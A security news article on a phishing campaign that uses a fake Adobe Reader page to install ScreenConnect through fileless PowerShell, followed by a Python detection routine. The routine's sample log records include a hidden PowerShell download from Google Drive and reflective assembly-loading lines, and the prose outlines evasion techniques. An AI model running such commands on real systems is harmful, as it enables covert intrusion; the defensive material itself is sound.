Fake Adobe Reader lure turns remote tool rogue

Attackers are exploiting trust in Adobe’s brand to deliver covert remote access, using a fake Acrobat Reader download page to install ConnectWise ScreenConnect through a fileless, memory-heavy attack chain that is designed to leave few traces on disk and make forensic analysis harder. Security researchers who uncovered the campaign said the operation began with a phishing site made to resemble Adobe’s official software page, where victims were pushed into downloading what looked like a legitimate installer but was in fact a heavily obfuscated Visual Basic script.

The campaign stands out less for novelty than for execution. According to Zscaler ThreatLabz, the bogus installer launched PowerShell with execution policy bypass, created a temporary directory, pulled additional code from Google Drive, and then compiled C# code directly in memory using PowerShell’s Add-Type cmdlet. That meant the core payload could run without being written to disk in a conventional executable form. Researchers said the loader then used .NET reflection to invoke the next stage, a technique that sharply reduces opportunities for traditional file-based defences to catch the malware before it runs.

From there, the attackers layered on evasive measures more commonly associated with advanced intrusions. Zscaler said the loader manipulated Windows process metadata through the Process Environment Block, rewriting fields so the malicious process could masquerade as a legitimate Windows binary. The same research also described abuse of auto-elevated COM objects to obtain higher privileges without prompting the victim with the usual user account control warning. Together, those methods gave the operation stealth and reach, allowing the attackers to blend into normal system activity while increasing control over the compromised machine.


ScreenConnect itself is not malware. It is a widely used remote support and access product marketed by ConnectWise for enterprise and IT administration, with functions that include remote support, remote access and privileged access. ConnectWise presents it as a security-focused platform with encryption, authentication, audit logging and role-based controls. That legitimate pedigree is exactly why such tools are attractive to attackers: they can provide powerful access while appearing less suspicious to users and, in some cases, to security software. There is no indication in the available reporting that Adobe’s or ConnectWise’s own infrastructure was compromised in this case; the abuse lay in imitation and repurposing, not in a confirmed breach of either vendor.

That pattern has become more pronounced across the cyber threat landscape. Microsoft said last month that it had observed February 2026 phishing campaigns using trusted branding, signed malware and remote monitoring and management tools to establish persistence inside victim environments. ConnectWise, in its 2026 MSP threat report, also said attackers were shifting away from dependence on novel exploits and increasingly abusing trusted identities, legitimate system tools and remote access infrastructure. The fake Reader lure fits squarely within that trend, where the line between authorised administration software and unauthorised control is deliberately blurred.

Timing has added another layer of concern. Adobe issued a security bulletin on 14 April for Acrobat and Reader, covering critical and important vulnerabilities, although Adobe said it was not aware of in-the-wild exploitation for the issues addressed in that bulletin. Separate security reporting this week has focused on an actively exploited Acrobat and Reader zero-day, but the fake-download campaign documented by Zscaler is a distinct threat path: it relies on social engineering and a spoofed download portal rather than requiring exploitation of an Adobe software flaw on the victim machine. That distinction matters because it shows how attackers can profit from brand familiarity even when users believe they are taking a protective step by fetching a trusted application.

For defenders, the lesson is straightforward but demanding. Blocking suspicious download domains, monitoring PowerShell misuse, restricting script execution, and watching for unauthorised deployment of remote management tools are all necessary, but none is sufficient on its own. Security teams also need tighter controls around legitimate remote access products, because once such a tool is planted under hostile control, it can enable surveillance, lateral movement and data theft without the conspicuous behaviour often associated with commodity malware. Organisations that allow ScreenConnect or similar tools in their environments face a particular challenge: distinguishing authorised support activity from intrusions that hide behind familiar software names and standard administrative functions.
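As an added illustration, not code from the article or from Zscaler's research, the following Python routine scores PowerShell script-block or process command-line records against indicators drawn from the chain described above (execution policy bypass, Add-Type in-memory compilation, reflective invocation, Google Drive staging, ScreenConnect installation). The regular expressions and the sample records are constructed for this example; they are not published signatures or telemetry from the campaign.

```python
import re
from dataclasses import dataclass, field

# Indicators modelled on the reported chain. These are approximations written
# for this example, not vendor signatures; tune them against your own baseline.
INDICATORS = {
    "exec_policy_bypass": re.compile(r"-(?:ExecutionPolicy|ep)\s+Bypass", re.I),
    "in_memory_compile": re.compile(r"\bAdd-Type\b", re.I),
    "reflective_load": re.compile(r"\[(?:System\.)?Reflection\.Assembly\]::Load|\.Invoke\(", re.I),
    "cloud_staging": re.compile(r"drive\.google\.com", re.I),
    "rmm_install": re.compile(r"ScreenConnect", re.I),
}


@dataclass
class Event:
    record_id: int
    text: str                       # e.g. Event 4104 ScriptBlockText or a 4688/Sysmon CommandLine
    matched: list = field(default_factory=list)


def score_event(ev: Event) -> Event:
    """Attach the names of every indicator that fires on this record."""
    ev.matched = [name for name, rx in INDICATORS.items() if rx.search(ev.text)]
    return ev


def triage(events, min_hits=2):
    """Return records with at least min_hits indicators, most suspicious first.

    A single hit (Add-Type alone, or one ScreenConnect installer) is common in
    legitimate administration, so the default threshold requires two indicators
    on the same record before it is surfaced for review.
    """
    scored = [score_event(e) for e in events]
    flagged = [e for e in scored if len(e.matched) >= min_hits]
    return sorted(flagged, key=lambda e: len(e.matched), reverse=True)


# Constructed sample records for the example (not real telemetry).
SAMPLE_EVENTS = [
    Event(1, 'powershell.exe -ExecutionPolicy Bypass -w hidden -c "iwr https://drive.google.com/uc?id=PLACEHOLDER -OutFile $env:TEMP\\s\\a.cs"'),
    Event(2, 'Add-Type -TypeDefinition (Get-Content $env:TEMP\\s\\a.cs -Raw); [Reflection.Assembly]::Load($b).EntryPoint.Invoke($null,$null)'),
    Event(3, 'powershell.exe -Command "Get-ChildItem C:\\Logs | Sort-Object LastWriteTime"'),
    Event(4, 'Add-Type -AssemblyName System.Windows.Forms'),          # benign pattern: one hit only
    Event(5, 'msiexec.exe /i ScreenConnect.ClientSetup.msi /qn'),      # one hit; needs change-ticket context
]

if __name__ == "__main__":
    for ev in triage(SAMPLE_EVENTS):
        print(ev.record_id, ev.matched)
```

Records 1 and 2 are surfaced with the default threshold; the ScreenConnect installer alone is not, which is where reconciling installs against authorised support activity has to take over.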
